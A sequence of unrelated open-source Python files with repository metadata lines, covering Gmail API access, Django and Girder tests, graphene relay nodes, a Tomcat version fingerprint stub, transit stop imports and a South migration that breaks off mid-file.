# Try to retrieve credentials from storage or run the flow to generate them
credentials = STORAGE.get()
if credentials is None or credentials.invalid:
credentials = run_flow(flow, STORAGE, flags, http=http)
# Authorize the httplib2.Http object with our credentials
http = credentials.authorize(http)
# Build the Gmail service from discovery
gmail_service = build('gmail', 'v1', http=http)
threads = gmail_service.users().threads().list(userId='me').execute()
# Print ID for each thread
if threads['threads']:
for thread in threads['threads']:
print 'Thread ID: %s' % (thread['id'])
break
#pp = pprint.PrettyPrinter(indent=4)
# Retrieve a page of threads
#threads = gmail_service.users().messages().get(userId='me', id='14d3127cf1a769d4').execute()
#print base64.b64decode(threads['payload']['body']['data']) | RylanGotto/web-dash | websterton/oauth/gmail.py | Python | bsd-3-clause | 1,746 |
"""
Application urlconfig
"""
from __future__ import absolute_import
from django.conf.urls import url
from . import views
urlpatterns = [
url(
r"^(?P<uuid>[0-9a-f-]{36})/$",
views.RateView.as_view(),
name="rate"
),
url(
r"^2/(?P<uuid>[0-9a-f-]{36})/$",
views.Rate2View.as_view(),
name="rate2"
)
]
| RightToResearch/OpenCon-Rating-App | project/rating/urls.py | Python | mit | 365 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
###############################################################################
# Copyright 2013 Kitware Inc.
#
# Licensed under the Apache License, Version 2.0 ( the "License" );
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
###############################################################################
import os
import six
import subprocess
import sys
import time
# Need to set the environment variable before importing girder
os.environ['GIRDER_PORT'] = os.environ.get('GIRDER_PORT', '30001') # noqa
from girder.api import access
from girder.api.describe import Description
from girder.api.rest import Resource, RestException
from girder.constants import ROOT_DIR
from girder.utility.progress import ProgressContext
from . import base
from six.moves import range
testServer = None
def setUpModule():
global testServer
mockS3 = False
if 's3' in os.environ['ASSETSTORE_TYPE']:
mockS3 = True
plugins = os.environ.get('ENABLED_PLUGINS', '')
if plugins:
base.enabledPlugins.extend(plugins.split())
testServer = base.startServer(False, mockS3=mockS3)
def tearDownModule():
base.stopServer()
class WebClientTestEndpoints(Resource):
def __init__(self):
self.route('GET', ('progress', ), self.testProgress)
self.route('PUT', ('progress', 'stop'), self.testProgressStop)
self.route('POST', ('file', ), self.uploadFile)
self.stop = False
@access.token
def testProgress(self, params):
test = params.get('test', 'success')
duration = int(params.get('duration', 10))
startTime = time.time()
with ProgressContext(True, user=self.getCurrentUser(),
title='Progress Test', message='Progress Message',
total=duration) as ctx:
for current in range(duration):
if self.stop:
break
ctx.update(current=current)
wait = startTime + current + 1 - time.time()
if wait > 0:
time.sleep(wait)
if test == 'error':
raise RestException('Progress error test.')
testProgress.description = (
Description('Test progress contexts from the web')
.param('test', 'Name of test to run. These include "success" and '
'"failure".', required=False)
.param('duration', 'Duration of the test in seconds', required=False,
dataType='int'))
@access.token
def testProgressStop(self, params):
self.stop = True
testProgressStop.description = (
Description('Halt all progress tests'))
@access.user
def uploadFile(self, params):
"""
Providing this works around a limitation in phantom that makes us
unable to upload binary files, or at least ones that contain certain
byte values. The path parameter should be provided relative to the
root directory of the repository.
"""
self.requireParams(('folderId', 'path'), params)
path = os.path.join(ROOT_DIR, params['path'])
name = os.path.basename(path)
folder = self.model('folder').load(params['folderId'], force=True)
upload = self.model('upload').createUpload(
user=self.getCurrentUser(), name=name, parentType='folder',
parent=folder, size=os.path.getsize(path))
with open(path, 'rb') as fd:
file = self.model('upload').handleChunk(upload, fd)
return file
uploadFile.description = None
class WebClientTestCase(base.TestCase):
def setUp(self):
self.specFile = os.environ['SPEC_FILE']
self.coverageFile = os.environ.get('COVERAGE_FILE', '')
assetstoreType = os.environ['ASSETSTORE_TYPE']
self.webSecurity = os.environ.get('WEB_SECURITY', 'true')
if self.webSecurity != 'false':
self.webSecurity = 'true'
base.TestCase.setUp(self, assetstoreType)
# One of the web client tests uses this db, so make sure it is cleared
# ahead of time. This still allows tests to be run in parallel, since
# nothing should be stored in this db
base.dropGridFSDatabase('girder_webclient_gridfs')
testServer.root.api.v1.webclienttest = WebClientTestEndpoints()
def testWebClientSpec(self):
baseUrl = '/static/built/testEnv.html'
if os.environ.get('BASEURL', ''):
baseUrl = os.environ['BASEURL']
cmd = (
os.path.join(
ROOT_DIR, 'node_modules', 'phantomjs', 'bin', 'phantomjs'),
'--web-security=%s' % self.webSecurity,
os.path.join(ROOT_DIR, 'clients', 'web', 'test', 'specRunner.js'),
'http://localhost:%s%s' % (os.environ['GIRDER_PORT'], baseUrl),
self.specFile,
self.coverageFile,
os.environ.get('JASMINE_TIMEOUT', '')
)
# phantomjs occasionally fails to load javascript files. This appears
# to be a known issue: https://github.com/ariya/phantomjs/issues/10652.
# Retry several times if it looks like this has occurred.
for tries in range(5):
retry = False
task = subprocess.Popen(cmd, stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
hasJasmine = False
jasmineFinished = False
for line in iter(task.stdout.readline, b''):
if isinstance(line, six.binary_type):
line = line.decode('utf8')
if ('PHANTOM_TIMEOUT' in line or
'error loading source script' in line):
task.kill()
retry = True
elif '__FETCHEMAIL__' in line:
base.mockSmtp.waitForMail()
msg = base.mockSmtp.getMail()
open('phantom_temp_%s.tmp' % os.environ['GIRDER_PORT'],
'wb').write(msg.encode('utf8'))
continue # we don't want to print this
if 'Jasmine' in line:
hasJasmine = True
if 'Testing Finished' in line:
jasmineFinished = True
sys.stdout.write(line)
sys.stdout.flush()
returncode = task.wait()
if not retry and hasJasmine and jasmineFinished:
break
if not hasJasmine:
time.sleep(1)
sys.stderr.write('Retrying test\n')
# If we are retrying, we need to reset the whole test, as the
# databases and other resources are in an unknown state
self.tearDown()
self.setUp()
self.assertEqual(returncode, 0)
| chrismattmann/girder | tests/web_client_test.py | Python | apache-2.0 | 7,277 |
"""
@author ksdme
Contains Utilities
"""
from sure.exceptions import SureTypeError
def u_resolve_fail(throws=False):
"""
decides what to do when
fail signal is returned
"""
if throws is None:
throws = False
if throws:
raise SureTypeError()
else:
return Consts.Fail
class ConstantValue(object):
""" simply used to build refs """
def __str__(self):
return "Const: " + str(self.msg)
def __init__(self, msg):
self.msg = msg
class Consts(object):
"""
Constants,
Enables reference checking
instead of value comparison
"""
# Used only in cases when a test fails
Fail = ConstantValue("Failed")
# simple optional flag
Optional = ConstantValue("Opt")
# Undefined yet
Undefined = ConstantValue("Undefined")
| ksdme/sure | sure/utilities.py | Python | mit | 858 |
from src.platform.tomcat.interfaces import ManagerInterface
class FPrint(ManagerInterface):
def __init__(self):
super(FPrint, self).__init__()
self.version = "7.0"
| GHubgenius/clusterd | src/platform/tomcat/fingerprints/Tomcat7M.py | Python | mit | 187 |
import logging
import warnings
import collections
from six import add_metaclass
from functools import partial
logger = logging.getLogger(__name__)
class Param(object):
"Describes a single parameter and defines a method for cleaning inputs."
def __init__(self, default=None, allow_list=False, description=None, param_key=None, choices=None, **kwargs):
self.default = default
self.allow_list = allow_list
self.description = description
self.param_key = param_key
self.choices = choices
for key in kwargs:
setattr(self, key, kwargs[key])
def clean(self, value, *args, **kwargs):
if self.choices and value not in self.choices:
raise ValueError('"{0}" not a valid choice'.format(value))
return value
def clean_list(self, values, *args, **kwargs):
return [self.clean(x, *args, **kwargs) for x in values]
class IntParam(Param):
def clean(self, value, *args, **kwargs):
return super(IntParam, self).clean(int(value), *args, **kwargs)
class FloatParam(Param):
def clean(self, value, *args, **kwargs):
return super(FloatParam, self).clean(float(value), *args, **kwargs)
class StrParam(Param):
def __init__(self, *args, **kwargs):
kwargs.setdefault('strip', True)
super(StrParam, self).__init__(*args, **kwargs)
def clean(self, value, *args, **kwargs):
value = str(value)
if self.strip:
value = value.strip()
return super(StrParam, self).clean(value, *args, **kwargs)
class UnicodeParam(StrParam):
def clean(self, value, *args, **kwargs):
value = str(value)
if self.strip:
value = value.strip()
return super(UnicodeParam, self).clean(value, *args, **kwargs)
class BoolParam(Param):
def __init__(self, *args, **kwargs):
kwargs.setdefault('true_values', ('t', 'true', '1', 'yes'))
kwargs.setdefault('false_values', ('f', 'false', '0', 'no'))
super(BoolParam, self).__init__(*args, **kwargs)
def clean(self, value, *args, **kwargs):
value = value.lower()
if value in self.true_values:
value = True
elif value in self.false_values:
value = False
else:
raise ValueError
return super(BoolParam, self).clean(value, *args, **kwargs)
class ParametizerMetaclass(type):
def __new__(cls, name, bases, attrs):
new_cls = type.__new__(cls, name, bases, attrs)
fields = getattr(new_cls, '_fields', {}).copy()
defaults = getattr(new_cls, '_defaults', {}).copy()
if hasattr(new_cls, 'param_defaults'):
warnings.warn('Resource.param_defaults has been deprecated', DeprecationWarning)
defaults.update(new_cls.param_defaults)
for attr, value in attrs.items():
if not isinstance(value, collections.Callable) and not attr.startswith('_'):
# Wrap shorthand definition in param class
if isinstance(value, Param):
field = value
key = field.param_key or attr
value = field.default
else:
key = attr
field = Param(default=value)
clean_method = 'clean_{0}'.format(attr)
# Partially apply the clean method with the field as self
if clean_method in attrs:
field.clean = partial(attrs[clean_method], field)
fields[key] = field
defaults[key] = value
new_cls._fields = fields
new_cls._defaults = defaults
return new_cls
@add_metaclass(ParametizerMetaclass)
class Parametizer(object):
def clean(self, params=None, defaults=None):
if params is None:
params = {}
param_defaults = self._defaults.copy()
if defaults is not None:
param_defaults.update(defaults)
cleaned = {}
# Gather both sets of keys since there may be methods defined
# without a default value specified.
keys = set(list(param_defaults.keys()) + list(params.keys()))
for key in keys:
# Add the default value for non-existant keys in params
if key not in params:
cleaned[key] = param_defaults[key]
continue
# Get associated param instance or initialize default one
field = self._fields.get(key, Param())
# Support MultiValueDict (request.GET and POST)
if field.allow_list and hasattr(params, 'getlist'):
value = params.getlist(key)
else:
value = params.get(key)
# If any kind of error occurs while cleaning, revert to
# the default value
try:
if isinstance(value, (list, tuple)):
value = field.clean_list(value)
if not field.allow_list:
value = value[0]
else:
value = field.clean(value)
except Exception as e:
logger.debug('Error cleaning parameter: {0}'.format(e), extra={
'key': key,
'value': value,
})
value = param_defaults.get(key, value)
cleaned[key] = value
return cleaned
| bruth/restlib2 | restlib2/params.py | Python | bsd-2-clause | 5,458 |
# This program is free software; you can redistribute it and/or modify
# it under the terms of the (LGPL) GNU Lesser General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Library Lesser General Public License for more details at
# ( http://www.gnu.org/licenses/lgpl.html ).
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
# written by: Jeff Ortel ( [email protected] )
"""
Contains xml document reader classes.
"""
from suds.sax.parser import Parser
from suds.transport import Request
from suds.cache import Cache, NoCache
from suds.store import DocumentStore
from suds.plugin import PluginContainer
from logging import getLogger
log = getLogger(__name__)
class Reader:
"""
The reader provides integration with cache.
@ivar options: An options object.
@type options: I{Options}
"""
def __init__(self, options):
"""
@param options: An options object.
@type options: I{Options}
"""
self.options = options
self.plugins = PluginContainer(options.plugins)
def mangle(self, name, x):
"""
Mangle the name by hashing the I{name} and appending I{x}.
@return: the mangled name.
"""
h = abs(hash(name))
return '%s-%s' % (h, x)
class DocumentReader(Reader):
"""
The XML document reader provides an integration
between the SAX L{Parser} and the document cache.
"""
def open(self, url):
"""
Open an XML document at the specified I{url}.
First, the document attempted to be retrieved from
the I{object cache}. If not found, it is downloaded and
parsed using the SAX parser. The result is added to the
cache for the next open().
@param url: A document url.
@type url: str.
@return: The specified XML document.
@rtype: I{Document}
"""
cache = self.cache()
id = self.mangle(url, 'document')
d = cache.get(id)
if d is None:
d = self.download(url)
cache.put(id, d)
self.plugins.document.parsed(url=url, document=d.root())
return d
def download(self, url):
"""
Download the docuemnt.
@param url: A document url.
@type url: str.
@return: A file pointer to the docuemnt.
@rtype: file-like
"""
store = DocumentStore()
fp = store.open(url)
if fp is None:
fp = self.options.transport.open(Request(url))
content = fp.read()
fp.close()
ctx = self.plugins.document.loaded(url=url, document=content)
content = ctx.document
sax = Parser()
return sax.parse(string=content)
def cache(self):
"""
Get the cache.
@return: The I{options} when I{cachingpolicy} = B{0}.
@rtype: L{Cache}
"""
if self.options.cachingpolicy == 0:
return self.options.cache
else:
return NoCache()
class DefinitionsReader(Reader):
"""
The WSDL definitions reader provides an integration
between the Definitions and the object cache.
@ivar fn: A factory function (constructor) used to
create the object not found in the cache.
@type fn: I{Constructor}
"""
def __init__(self, options, fn):
"""
@param options: An options object.
@type options: I{Options}
@param fn: A factory function (constructor) used to
create the object not found in the cache.
@type fn: I{Constructor}
"""
Reader.__init__(self, options)
self.fn = fn
def open(self, url):
"""
Open a WSDL at the specified I{url}.
First, the WSDL attempted to be retrieved from
the I{object cache}. After unpickled from the cache, the
I{options} attribute is restored.
If not found, it is downloaded and instantiated using the
I{fn} constructor and added to the cache for the next open().
@param url: A WSDL url.
@type url: str.
@return: The WSDL object.
@rtype: I{Definitions}
"""
cache = self.cache()
id = self.mangle(url, 'wsdl')
d = cache.get(id)
if d is None:
d = self.fn(url, self.options)
cache.put(id, d)
else:
d.options = self.options
for imp in d.imports:
imp.imported.options = self.options
return d
def cache(self):
"""
Get the cache.
@return: The I{options} when I{cachingpolicy} = B{1}.
@rtype: L{Cache}
"""
if self.options.cachingpolicy == 1:
return self.options.cache
else:
return NoCache() | marcellodesales/svnedge-console | svn-server/lib/suds/reader.py | Python | agpl-3.0 | 5,243 |
'''
Workaround for issue with Python mailbox module mis-reading Usenet
Historical Collection mbox files. Identifies all instances of "from"
that are *not* in the header, changes them to "xFrom," and writes
them to a new mailbox.
'''
batch = []
box = raw_input("What is the mailbox you want to work with? ")
newbox = raw_input("What is the name of the file it should output to? ")
with open(box, 'rb') as original, open(newbox, 'wb') as new:
for line in original:
if "From " in line:
num = line[6]
#Checks to see if is added Google Groups header
if num.isdigit() is True:
#Skips edit if True
batch.append(line)
else:
x = line.replace("From ", "xFrom ")
batch.append(x)
else:
batch.append(line)
for line in batch:
#Writes edited mailbox to new file
new.writelines(line)
print "Editing complete!"
| apdame/usenet-tools | fromedit.py | Python | mit | 992 |
from functools import partial
import six
from graphql_relay import from_global_id, to_global_id
from ..types import ID, Field, Interface, ObjectType
from ..types.interface import InterfaceMeta
def is_node(objecttype):
'''
Check if the given objecttype has Node as an interface
'''
assert issubclass(objecttype, ObjectType), (
'Only ObjectTypes can have a Node interface. Received %s'
) % objecttype
for i in objecttype._meta.interfaces:
if issubclass(i, Node):
return True
return False
def get_default_connection(cls):
from .connection import Connection
assert issubclass(cls, ObjectType), (
'Can only get connection type on implemented Nodes.'
)
class Meta:
node = cls
return type('{}Connection'.format(cls.__name__), (Connection,), {'Meta': Meta})
class GlobalID(Field):
def __init__(self, node, *args, **kwargs):
super(GlobalID, self).__init__(ID, *args, **kwargs)
self.node = node
@staticmethod
def id_resolver(parent_resolver, node, root, args, context, info):
id = parent_resolver(root, args, context, info)
return node.to_global_id(info.parent_type.name, id) # root._meta.name
def get_resolver(self, parent_resolver):
return partial(self.id_resolver, parent_resolver, self.node)
class NodeMeta(InterfaceMeta):
def __new__(cls, name, bases, attrs):
cls = InterfaceMeta.__new__(cls, name, bases, attrs)
cls._meta.fields['id'] = GlobalID(cls, required=True, description='The ID of the object.')
return cls
class NodeField(Field):
def __init__(self, node, type=False, deprecation_reason=None,
name=None, **kwargs):
assert issubclass(node, Node), 'NodeField can only operate in Nodes'
type = type or node
super(NodeField, self).__init__(
type,
description='The ID of the object',
id=ID(required=True),
resolver=node.node_resolver
)
class Node(six.with_metaclass(NodeMeta, Interface)):
'''An object with an ID'''
@classmethod
def Field(cls, *args, **kwargs): # noqa: N802
return NodeField(cls, *args, **kwargs)
@classmethod
def node_resolver(cls, root, args, context, info):
return cls.get_node_from_global_id(args.get('id'), context, info)
@classmethod
def get_node_from_global_id(cls, global_id, context, info):
try:
_type, _id = cls.from_global_id(global_id)
graphene_type = info.schema.get_type(_type).graphene_type
# We make sure the ObjectType implements the "Node" interface
assert cls in graphene_type._meta.interfaces
except:
return None
get_node = getattr(graphene_type, 'get_node', None)
if get_node:
return get_node(_id, context, info)
@classmethod
def from_global_id(cls, global_id):
return from_global_id(global_id)
@classmethod
def to_global_id(cls, type, id):
return to_global_id(type, id)
@classmethod
def implements(cls, objecttype):
get_connection = getattr(objecttype, 'get_connection', None)
if not get_connection:
get_connection = partial(get_default_connection, objecttype)
objecttype.Connection = get_connection()
| sjhewitt/graphene | graphene/relay/node.py | Python | mit | 3,371 |
import ujson
from socorro.unittest.testbase import TestCase
from nose.tools import eq_, ok_
from mock import Mock, patch
from configman import ConfigurationManager
from configman.dotdict import DotDict
from socorro.processor.processor_2015 import (
Processor2015,
rule_sets_from_string
)
from socorro.lib.util import DotDict as SDotDict
from socorro.lib.transform_rules import TransformRuleSystem
from socorro.processor.support_classifiers import (
BitguardClassifier,
OutOfDateClassifier
)
from socorro.processor.skunk_classifiers import (
SetWindowPos,
UpdateWindowAttributes
)
rule_set_01 = [
[
'ruleset01',
'tag0.tag1',
'socorro.lib.transform_rules.TransformRuleSystem',
'apply_all_rules',
'socorro.processor.support_classifiers.BitguardClassifier, '
'socorro.processor.support_classifiers.OutOfDateClassifier'
]
]
rule_set_01_str = ujson.dumps(rule_set_01)
rule_set_02 = [
[
'ruleset01',
'tag0.tag1',
'socorro.lib.transform_rules.TransformRuleSystem',
'apply_all_rules',
'socorro.processor.support_classifiers.BitguardClassifier, '
'socorro.processor.support_classifiers.OutOfDateClassifier'
],
[
'ruleset02',
'tag2.tag3',
'socorro.lib.transform_rules.TransformRuleSystem',
'apply_until_action_succeeds',
'socorro.processor.skunk_classifiers.SetWindowPos, '
'socorro.processor.skunk_classifiers.UpdateWindowAttributes'
],
]
rule_set_02_str = ujson.dumps(rule_set_02)
class TestProcessor2015(TestCase):
def test_rule_sets_from_string_1(self):
rule_set_config = rule_sets_from_string(rule_set_01_str)
rc = rule_set_config.get_required_config()
ok_('ruleset01' in rc)
eq_('tag0.tag1', rc.ruleset01.tag.default)
eq_(
'socorro.lib.transform_rules.TransformRuleSystem',
rc.ruleset01.rule_system_class.default
)
eq_('apply_all_rules', rc.ruleset01.action.default)
eq_(
'socorro.processor.support_classifiers.BitguardClassifier, '
'socorro.processor.support_classifiers.OutOfDateClassifier',
rc.ruleset01.rules_list.default
)
def test_rule_sets_from_string_2(self):
rule_set_config = rule_sets_from_string(rule_set_02_str)
rc = rule_set_config.get_required_config()
ok_('ruleset01' in rc)
eq_('tag0.tag1', rc.ruleset01.tag.default)
eq_(
'socorro.lib.transform_rules.TransformRuleSystem',
rc.ruleset01.rule_system_class.default
)
eq_('apply_all_rules', rc.ruleset01.action.default)
eq_(
'socorro.processor.support_classifiers.BitguardClassifier, '
'socorro.processor.support_classifiers.OutOfDateClassifier',
rc.ruleset01.rules_list.default
)
ok_('ruleset02' in rc)
eq_('tag2.tag3', rc.ruleset02.tag.default)
eq_(
'socorro.lib.transform_rules.TransformRuleSystem',
rc.ruleset02.rule_system_class.default
)
eq_('apply_until_action_succeeds', rc.ruleset02.action.default)
eq_(
'socorro.processor.skunk_classifiers.SetWindowPos, '
'socorro.processor.skunk_classifiers.UpdateWindowAttributes',
rc.ruleset02.rules_list.default
)
def test_Processor2015_init(self):
cm = ConfigurationManager(
definition_source=Processor2015.get_required_config(),
values_source_list=[{'rule_sets': rule_set_02_str}],
)
config = cm.get_config()
config.logger = Mock()
p = Processor2015(config)
ok_(isinstance(p.rule_system, DotDict))
eq_(len(p.rule_system), 2)
ok_('ruleset01' in p.rule_system)
print p.rule_system.ruleset01
ok_(isinstance(p.rule_system.ruleset01, TransformRuleSystem))
trs = p.rule_system.ruleset01
eq_(trs.act, trs.apply_all_rules)
eq_(len(trs.rules), 2)
ok_(isinstance(trs.rules[0], BitguardClassifier))
ok_(isinstance(trs.rules[1], OutOfDateClassifier))
ok_('ruleset02' in p.rule_system)
ok_(isinstance(p.rule_system.ruleset02, TransformRuleSystem))
trs = p.rule_system.ruleset02
eq_(trs.act, trs.apply_until_action_succeeds)
eq_(len(trs.rules), 2)
ok_(isinstance(trs.rules[0], SetWindowPos))
ok_(isinstance(trs.rules[1], UpdateWindowAttributes))
def test_convert_raw_crash_to_processed_crash_no_rules(self):
cm = ConfigurationManager(
definition_source=Processor2015.get_required_config(),
values_source_list=[{'rule_sets': '[]'}],
)
config = cm.get_config()
config.logger = Mock()
config.processor_name = 'dwight'
p = Processor2015(config)
raw_crash = DotDict()
raw_dumps = {}
with patch('socorro.processor.processor_2015.utc_now') as faked_utcnow:
faked_utcnow.return_value = '2015-01-01T00:00:00'
processed_crash = p.convert_raw_crash_to_processed_crash(
raw_crash,
raw_dumps
)
ok_(processed_crash.success)
eq_(processed_crash.started_datetime, '2015-01-01T00:00:00')
eq_(processed_crash.startedDateTime, '2015-01-01T00:00:00')
eq_(processed_crash.completed_datetime, '2015-01-01T00:00:00')
eq_(processed_crash.completeddatetime, '2015-01-01T00:00:00')
eq_(processed_crash.processor_notes, 'dwight; Processor2015')
| rhelmer/socorro-lib | socorro/unittest/processor/test_processor_2015.py | Python | mpl-2.0 | 5,629 |
"""Import an Irish NaPTAN XML file, obtainable from
https://data.dublinked.ie/dataset/national-public-transport-nodes/resource/6d997756-4dba-40d8-8526-7385735dc345
"""
import warnings
import zipfile
import xml.etree.cElementTree as ET
from django.contrib.gis.geos import Point
from django.core.management.base import BaseCommand
from ...models import Locality, AdminArea, StopPoint
class Command(BaseCommand):
ns = {'naptan': 'http://www.naptan.org.uk/'}
@staticmethod
def add_arguments(parser):
parser.add_argument('filenames', nargs='+', type=str)
def handle_stop(self, element):
stop = StopPoint(
atco_code=element.find('naptan:AtcoCode', self.ns).text,
locality_centre=element.find('naptan:Place/naptan:LocalityCentre', self.ns).text == 'true',
active=element.get('Status') == 'active',
)
for subelement in element.find('naptan:Descriptor', self.ns):
tag = subelement.tag[27:]
if tag == 'CommonName':
stop.common_name = subelement.text
elif tag == 'Street':
stop.street = subelement.text
elif tag == 'Indicator':
stop.indicator = subelement.text.lower()
else:
warnings.warn('Stop {} has an unexpected property: {}'.format(stop.atco_code, tag))
stop_classification_element = element.find('naptan:StopClassification', self.ns)
stop_type = stop_classification_element.find('naptan:StopType', self.ns).text
if stop_type != 'class_undefined':
stop.stop_type = stop_type
bus_element = stop_classification_element.find('naptan:OnStreet/naptan:Bus', self.ns)
if bus_element is not None:
stop.bus_stop_type = bus_element.find('naptan:BusStopType', self.ns).text
stop.timing_status = bus_element.find('naptan:TimingStatus', self.ns).text
compass_point_element = bus_element.find(
'naptan:MarkedPoint/naptan:Bearing/naptan:CompassPoint', self.ns
)
if compass_point_element is not None:
stop.bearing = compass_point_element.text
if stop.bus_stop_type == 'type_undefined':
stop.bus_stop_type = ''
place_element = element.find('naptan:Place', self.ns)
location_element = place_element.find('naptan:Location', self.ns)
longitude_element = location_element.find('naptan:Longitude', self.ns)
latitude_element = location_element.find('naptan:Latitude', self.ns)
if longitude_element is None:
warnings.warn('Stop {} has no location'.format(stop.atco_code))
else:
stop.latlong = Point(float(longitude_element.text), float(latitude_element.text))
admin_area_id = element.find('naptan:AdministrativeAreaRef', self.ns).text
if not AdminArea.objects.filter(atco_code=admin_area_id).exists():
AdminArea.objects.create(id=admin_area_id, atco_code=admin_area_id, region_id='NI')
stop.admin_area_id = admin_area_id
locality_element = place_element.find('naptan:NptgLocalityRef', self.ns)
if locality_element is not None:
if not Locality.objects.filter(id=locality_element.text).exists():
Locality.objects.create(id=locality_element.text, admin_area_id=admin_area_id)
stop.locality_id = locality_element.text
stop.save()
def handle_file(self, archive, filename):
with archive.open(filename) as open_file:
iterator = ET.iterparse(open_file)
for _, element in iterator:
tag = element.tag[27:]
if tag == 'StopPoint':
self.handle_stop(element)
element.clear()
def handle(self, *args, **options):
for filename in options['filenames']:
with zipfile.ZipFile(filename) as archive:
for filename in archive.namelist():
self.handle_file(archive, filename)
| stev-0/bustimes.org.uk | busstops/management/commands/import_ie_naptan_xml.py | Python | mpl-2.0 | 4,087 |
# -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'ConceptNode.max_children'
db.add_column(u'nodemanager_conceptnode', 'max_children',
self.gf('django.db.models.fields.IntegerField')(default=5),
keep_default=False)
# Adding field 'ConceptNode.child_typename'
db.add_column(u'nodemanager_conceptnode', 'child_typename',
self.gf('django.db.models.fields.CharField')(default='unnamed', max_length=50),
keep_default=False)
# Changing field 'ConceptNode.node_type'
db.alter_column(u'nodemanager_conceptnode', 'node_type', self.gf('django.db.models.fields.CharField')(max_length=1))
# Removing M2M table for field admins on 'CITreeInfo'
db.delete_table(db.shorten_name(u'nodemanager_citreeinfo_admins'))
# Removing M2M table for field users on 'CITreeInfo'
db.delete_table(db.shorten_name(u'nodemanager_citreeinfo_users'))
def backwards(self, orm):
# Deleting field 'ConceptNode.max_children'
db.delete_column(u'nodemanager_conceptnode', 'max_children')
# Deleting field 'ConceptNode.child_typename'
db.delete_column(u'nodemanager_conceptnode', 'child_typename')
# Changing field 'ConceptNode.node_type'
db.alter_column(u'nodemanager_conceptnode', 'node_type', self.gf('django.db.models.fields.CharField')(max_length=2))
# Adding M2M table for field admins on 'CITreeInfo'
m2m_table_name = db.shorten_name(u'nodemanager_citreeinfo_admins')
db.create_table(m2m_table_name, (
('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)),
('citreeinfo', models.ForeignKey(orm[u'nodemanager.citreeinfo'], null=False)),
('user', models.ForeignKey(orm[u'authtools.user'], null=False))
))
db.create_unique(m2m_table_name, ['citreeinfo_id', 'user_id'])
# Adding M2M table for field users on 'CITreeInfo'
m2m_table_name = db.shorten_name(u'nodemanager_citreeinfo_users')
db.create_table(m2m_table_name, (
('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)),
('citreeinfo', models.ForeignKey(orm[u'nodemanager.citreeinfo'], null=False)),
('user', models.ForeignKey(orm[u'authtools.user'], null=False))
))
db.create_unique(m2m_table_name, ['citreeinfo_id', 'user_id'])
models = {
u'auth.group': {
'Meta': {'object_name': 'Group'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
u'auth.permission': {
'Meta': {'ordering': "(u'content_type__app_label', u'content_type__model', u'codename')", 'unique_together': "((u'content_type', u'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
u'authtools.user': {
'Meta': {'ordering': "[u'name', u'email']", 'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'unique': 'True', 'max_length': '255', 'db_index': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "u'user_set'", 'blank': 'True', 'to': u"orm['auth.Group']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "u'user_set'", 'blank': 'True', 'to': u"orm['auth.Permission']"})
},
u'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
u'nodemanager.citreeinfo': {
'Meta': {'object_name': 'CITreeInfo'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_master': ('django.db.models.fields.BooleanField', [], {'default': 'False'})
},
u'nodemanager.conceptatom': {
'Meta': {'object_name': 'ConceptAtom'},
'concept_node': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['nodemanager.ConceptNode']"}),
'final_choice': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'merged_atoms': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['nodemanager.ConceptAtom']", 'null': 'True', 'on_delete': 'models.SET_NULL'}),
'text': ('django.db.models.fields.CharField', [], {'max_length': '140'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['authtools.User']"})
},
u'nodemanager.conceptnode': {
